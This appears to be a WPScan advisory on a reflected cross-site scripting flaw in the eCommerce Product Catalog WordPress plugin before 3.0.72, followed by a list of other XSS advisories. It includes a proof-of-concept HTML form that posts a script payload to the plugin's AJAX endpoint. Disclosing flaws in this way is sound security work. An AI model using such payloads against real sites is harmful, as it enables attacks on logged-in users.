eCommerce Product Catalog Plugin for WordPress < 3.0.72 – Reflected XSS via AJAX | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action available to any authenticated users, such as subscriber, leading to a Reflected Cross-Site Scripting

Proof of Concept

Make a logged in user open a page containing the HTML code below

<form action="https://example.com/wp-admin/admin-ajax.php?action=ic_search_docs" method="POST">
    <input type="text" name="term" value="<script>alert(/XSS/)</script>">
    <input type="submit" name="submit" value="submit">
</form>

Affects Plugins

ecommerce-product-catalog

Fixed in 3.0.72

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID

751aaef4-af74-45bd-93d8-9ec5573556a1

Timeline

Publicly Published

2022-10-17 (about 1 years ago)

Added

2022-10-17 (about 1 years ago)

Last Updated

2022-10-17 (about 1 years ago)

Other

Published

Title

Published

2024-02-06

Title

Starbox < 3.5.0 - Authenticated (Subscriber+) Stored Cross-Site Scripting via Job Settings

Published

2015-08-20

Title

Alpine PhotoTile for Instagram <= 1.2.7.5 - Authenticated Cross-Site Scripting (XSS)

Published

2014-08-01

Title

ALO EasyMail Newsletter 2.4.7 - Multiple Unspecified XSS

Published

2023-02-23

Title

TypeSquare Webfonts for ConoHa < 2.0.4 - Admin+ Stored XSS

Published

2024-03-28

Title

The Plus Blocks for Block Editor | Gutenberg < 3.2.6 - Reflected Cross-Site Scripting